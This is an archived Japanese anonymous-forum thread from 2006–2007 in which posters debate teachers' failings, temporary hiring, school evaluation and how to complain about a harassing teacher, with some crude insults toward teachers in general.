233 :227:2006/12/27(水) 01:49:58 ID:3SVbSArh
>>231
ありがと!
>>232
そんな違うもんなん?

234 :実習生さん:2006/12/27(水) 01:52:37 ID:3SVbSArh
>>231
そうなったら解雇とかになるんですか?

235 :実習生さん:2006/12/27(水) 02:03:40 ID:fnIvoDat
たぶん、訴えるケース増えるだろうな・・。
事実無根気味で高校生なら職員会議で話題になって、停・退学でしょ。

232は、進学校じゃないでしょ。進学校行ってたら、一回一回そんな
こと教師にしてたら勉強するどころじゃないし、進学校の教師はそんな
問題になるようなことしないもの。
 あんまりそんなレベルのとこの学校の生徒じゃ、マークはされても
行政もとりあわないんじゃない?

236 :実習生さん:2006/12/27(水) 02:39:23 ID:fnIvoDat
っていうか232は別スレで生徒じゃない内容書いてるじゃん。
生徒のふり?塾講師?

237 :実習生さん:2006/12/27(水) 02:56:28 ID:28JK0cqI
>>234
不合格と教師の嫌がらせとの因果関係を立証するのは難しいけれども
その後の絡んでくる言動を録音しておいて教育委員会あてに内容証明出すなりすれば
軽い訓告処分は出る可能性はありますね。
PTSDになっていればその診断書も処分を重くするのに有効です。
ただこの程度で解雇はないです。円光等でないと…


238 :実習生さん:2006/12/27(水) 04:10:57 ID:rJo0e/wi
教師の問題点

・正採用でない期限付、条件付任用の増加
 これらで任用されると待遇が派遣奴隷並に悪い 
 ↓
 著作物、集会などで泣き言、繰言の連発
 状況改善への具体的成果なし
 正採用の同僚をうらやむだけ
 そもそも、公立学校の教員になろうと志すときに
 こうしたリスクはわかっているはず
 リスクマネジメント能力低すぎ

239 :実習生さん:2006/12/27(水) 04:16:28 ID:rJo0e/wi
教師の問題点2

・多くの公立高校で情報開示と
 それに基づく学校評価のシステムがいまだに確立されていない
   ↓
 学校長の行き過ぎたトップダウン体制をとっている学校が多い
 その学校長も2〜3年で転任、ローテーション
 学校長の方針施策の反省や評価がなされないまま
 次の学校長がやってきて同じようにトップダウン、そして無限ループ
 教員はそれを変えようとしない。変えないほうが楽だから。
 多くの教員が「教員」評価に反対している。
 報酬と結びつけることになるともっと反対する。
 

240 :実習生さん:2006/12/27(水) 04:21:43 ID:rJo0e/wi
とりあえず
ガイシュツしてないの2つあげたけどどうだろ?

教員は授業と人生相談だけやってりゃいい、というものではない。
学校という組織を管理する仕事もするのに
それがなってなさすぎ。そういうことにやる気がない。

しかも授業の改善工夫なんかやってるのは一握りの人間
評価されるのを嫌い、「教育の自由」の侵害をタテに反抗している
子供の学習権なんか二の次だ。自分が楽したいだけ。



241 :実習生さん:2006/12/28(木) 01:58:10 ID:N5kXPex6
それどころか授業だけやってれば良いと思うよ。
出来もしない責任を押し付けるから相対的に無能化する…
或いはつけあがるのだ。

242 :実習生さん:2006/12/29(金) 02:02:46 ID:kw0ORekb
>>238
教員の定員枠があるにもかかわらず常勤・非常勤を雇うのは自治体が悪いだろ。
それで経費削減してるつもりになってる。
大概の人間はリスクは承知している。
そして団塊がやめていくことに期待しているw

愚痴くらい言わせろよw

>>239
先生やったことないでしょ?まじめにやってる先生は内(生徒・授業・分掌)で手一杯。
商品は人間だしモノを作るのとは違うよ。
まじめじゃない先生はまじめじゃないから使い物にならないし。
オレはリーマンになったことはないけど、リーマンは一人で内外両方やんの?平社員が。

あと教育の評価って具体的にどうやんの?
そこが確立してないから反対している人って結構多いよ。
営業やらなんやらは「数字」で表れるだろうけど、学校で数字で表れるのってテストだけだ。


と思うままに書いたけどどうだろ?

243 :実習生さん:2006/12/30(土) 23:46:34 ID:sL+K/MLZ
教 師 っ て 人 間 の カ ス ば っ か

ウム、まさにまさに

244 :実習生さん:2006/12/31(日) 01:36:37 ID:SrVXTnui
>>243
> 教 師 っ て 人 間 の カ ス ば っ か
>
> ウム、まさにまさに

全ての教師のフォローをする気などさらさら無いが・・・
小中高の6+3+3=12年で、担任はだいたい9人
その他の授業を受け持つ先生を入れても30人ってところでしょ?
それだけで、全ての教師の良し悪しを判断する自信は無いな
マスゴミが出すネタ教師はノーカウントで

245 :実習生さん:2007/01/09(火) 13:38:25 ID:IipTW+3w
242、言いたい事、解るよ。でもさ、これだけ飽きもせず、次から次へと事件おこされて、教員への不信感ばかりになってさ。何言っても、もう遅いよな…

246 :実習生さん:2007/01/16(火) 00:17:31 ID:zobPsCGM
あー、やっぱり狂士はカスでんなぁ。そーゆー素質と、大卒の肩書があれば、即決でなれるかすの団体だ。

247 :実習生さん:2007/01/16(火) 18:25:18 ID:58WMgTJU
教職取った時点でカスと呼ばせていただく。

248 :実習生さん:2007/01/16(火) 19:08:00 ID:nYquXrN1
http://blogs.yahoo.co.jp/uchan_060526/7456609.html#11704699

奈良県の体罰問題でブログ炎上中


68 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)